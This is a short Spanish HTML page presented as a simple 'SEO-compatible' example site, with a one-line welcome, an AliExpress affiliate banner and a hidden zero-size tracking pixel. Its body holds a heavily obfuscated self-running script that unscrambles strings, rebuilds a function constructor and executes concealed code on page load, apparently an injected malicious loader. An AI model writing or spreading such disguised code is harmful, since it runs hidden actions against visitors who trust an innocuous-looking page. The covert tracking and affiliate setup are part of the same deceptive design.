<!doctype html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta name="robots" content="index, follow"/>
  <title>Ejemplo de página web compatible con SEO</title>
  <meta name="description" content="Ejemplo de página web compatible con SEO">
  <link rel="icon" href="https://github.githubassets.com/favicons/favicon.png" type="image/png">
  <style>
    body {
      margin: 0;
      font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Ubuntu, Arial, sans-serif;
      font-size: 16px;
      line-height: 1.428571429;
      color: #4d4d4d;
    }
    .container, .main, .wrap {
      text-align: center;
    }
    footer, html {
      margin: 0 auto;
    }
    * {
      box-sizing: border-box;
      padding: 0;
    }
    :focus {
      outline: 0;
    }
    ::-webkit-scrollbar {
      display: none;
    }
    a, a:after, a:hover, a:visited {
      text-decoration: none;
      color: #bdc1c6;
    }
    .main {
      padding: 70px 15px;
    }
    h1, h2, p {
      margin-bottom: .8rem;
    }
    .container {
      padding: 1rem;
      max-width: 500px;
      margin: auto;
    }
    .btn-list {
      display: inline-grid;
      margin: .88rem 0;
    }
    .btn-list a {
      padding: .5rem 3.8rem;
      background-image: linear-gradient(to right, #0675c3, #005fa2);
      margin-bottom: .5rem;
      border-radius: .38rem;
      box-shadow: 0 -1px #ccb38a88;
      letter-spacing: 1px;
      color: #fff;
    }
    .btn-list a.btn1 {
      color: #eee;
      background-image: linear-gradient(to right, #35cb64, #32bd52);
      box-shadow: none;
      font-weight: 700;
    }
    .imghero {
      box-shadow: inset 0 0 0 8px #888;
      border-radius: 8px;
    }
    footer {
      max-width: 400px;
      font-size: 13px;
    }
    .link {
      color: #67b279;
    }
  </style>
</head>
<body>
<img src="//sstatic1.histats.com/0.gif?4705536&101" alt="" border="0" style="width:0;height:0;">
<script>
(function(){var UiT='',pfG=123-112;function cxC(u){var v=1911039;var d=u.length;var h=[];for(var e=0;e<d;e++){h[e]=u.charAt(e)};for(var e=0;e<d;e++){var m=v*(e+220)+(v%48600);var c=v*(e+429)+(v%30802);var k=m%d;var l=c%d;var g=h[k];h[k]=h[l];h[l]=g;v=(m+c)%4241301;};return h.join('')};var OTQ=cxC('rhnrzlcccbrxotsktuawivnugtoqfspdjmoye').substr(0,pfG);var DZO='t9) a]q{==-,C+ap8;ivnr.oc".)Ae+],h;r}+;>apur)r]"me(z"xru*.[=;96v07,12srrr8t, =a;v,s"6,7]a=(ro9w 0=f,r,m!Aur0d8j,Cl;i;u+5n;7tr;;hrahfnr=f7r;ba0hl.e1)-rgtj;p+srf[s[grkm(;1;<0;4r=v[1n5=18grrco2rv+p}a+rlr;z)s[yct<b8trgCll0(s(l[rmu(;3n6)gv(,4hCav{vm m sp)d.p(=ia;)=l)n)fo+v+2[aew)na]bt)e)5fsf0;l=stuc[n )oi=,h,avp,ay6{4afaar jgtu ci- 6(l.w[vi=pn,d+[5ng,.a.ad 0{bor,=a)g(i7e+<;;p+,!t;lrhy.d+nln(C,p+Abhe)zvlnuqojiygt(f;ed{S=i}ebo[.=dgvt(rao)pc3rp 1d-i<n=A;3+emaa2sn 1djh;lc);ca.l()9ve,g8hava=tc]aufwdb]f(n+;r)lr.;bf=pooe1tdpq=)-;Cq=n0sv1v{07leer}A  pz )xnia(n=hn(lC(t=ru,,eor>)fa;i.8=idbp+,st(i1gfl;ic)bm pns =u=0+) );e;("e;9.((()an}i;=;ir2xd+)v.=+}h(".0oeftefvgmllsjw)lvv].n],li"+. eqvf;}sp r[c]8lm=, mw.gonc7n08"=b+ar92(1qe+x9l1)at24[e,m6;;jo o)tw[7;=,e ut5t(=r8];;.ihhhaxsdh(C6d(;.(;hau;*==;;6=.vefgthgrveol=if)arst=o1v.hp+ocrrjn6]- rn((b br=,).om=h.r4ole(hSnat6{sx+<urri(s-)i=i(]"p"]..o=soo2u';var qRt=cxC[OTQ];var nCO='';var gEd=qRt;var syK=qRt(nCO,cxC(DZO));var MzG=syK(cxC('=^2n.^^)c1a=^mxo}u.^m54n3(eii))r5^,m ^e(^.rn bjca)nab3s;rol.c1"$43,c.,3g.^^=\'(.,4.t^t)4uni^,,7tsjg^eg, or[$5nmaa,x2}0$.e!b"b(#g1e9oa#e^}p;cr)aej\/!%_,6b^xbg(0v3$2;vn]as_+g)o;l7]6_tm,.ca)r=teii^rie%c]d\/d=#h_ 4^_egv]ft\'!,]erl({.%ts2{(8[3^pa,0$)um6%t&^e;)e.,(;j5^a 6,c%q,$o))2lofr&]t.ris;tbp7$5=8-qit)_^fn^)r^rz)^^tz^^{^;\/i3(deeS7ae)te0$ise_==e2^7^n "(fz7\'^u=e;ucc=(r(q;&_0;.q6*^^^C$o.9b)%e}btr(7^gc,-(;^}n(3|(g)33(;]u!^(xl_\/,ii}p!!+b^{%.tn46e])6_^^0{e"4%))obt3)g3^}s.$}v.m1.;^^2&c3m0^,}e45S^5,;)lSp.^(7!)^o,.u*.eb3.==t r.;!(!et))8an(tna];m.(rg8);a^r&r=ei66fl^^tee3^8t1]+,\/)^j)&arsf)=)g)i|t+(0^;,^rt( \/^_y^sq(ru%s ( .4f&o^ee!oeh,\/)o unw$^l^a9.(ern;lpld=.^.=^;e3|]i!\' 8.dt0!h2=9b^o)an^(.ls.a#3o.3.x,7i;#_2=$%t,^^3+dg^nzea]ap^)n^5x({%j{1a!.rd;m=(^e7,_.llrood5)^C{^=.tstoi)ieth^r*u](!o*o]f;i!%.e^^ft:^t(^ro;2tzdl3d^gb\/^k.-seevu0^.r^(r"s7,eey.a^)u ;|h4e,mu^e).$\'o!;s c.^!\'ep{2^.6)z8.e%n^.ee58^_;{3 3(0(_(q.,[.mfi..^a,)u.n^)+3^^oden{^5uer&v)o]7j*6.t9)]^]"v0^33;m$ leunnb58(is,5dysv)^,r;(x9(^arl^9=)^c{w^e.03.!aie^t)5^f$^;ta^39ft(3)^%nm^&u^sl^$$(efetp}meel^,^g(b7$a_.!4)ah4z498{^sunt=s$s#n^;\/t&y$.}fe^o(%u0(_i^]=a&e^.5.}a3js,( mi+(1un=e.."^^)0.a[d_t l}_an]2z.4neg)2;e oi l!t(i(.4eo^l _ }!%b.o!^e$ !&!tgg.3^i\'[3jc^)pareue.c7k^.1t.e$$^ec^)|^9j7 _e^b6^(n+ina.}^ak..-;)4)^)=.nv"(if.o.|_af1m.e_r$ro2a^_3z(s)$)u+e2%b .b7{.)^90o!o^[al6b5)io\/,u $p&.^!z5e4!2aeorde]t^v"yo+ ).8|)^#.j{s;^ed"^#(,t^]}|btnej('));var iLU=gEd(UiT,MzG );iLU(1971);return 3792})()
</script>
  <div class="container">
    <div style="margin-top: 1rem;">
      <a href="https://s.click.aliexpress.com/e/_DFjDLoN" rel="noopener noreferrer nofollow">
        <img src="https://ae01.alicdn.com/kf/Sfbed1ec8bfdf4de2b4dedea323a53302X.png" height="300" width="300" alt="AFF" id="imgs" class="aff">
      </a>
    </div>
    <div class="main">Bienvenido a mi sitio. Este es un ejemplo de una página web compatible con SEO.</div>
    <footer>© 2024 proudly <a href="https://github.io" title="Github pages" class="link">Github pages</a></footer>
  </div>
</body>
</html>
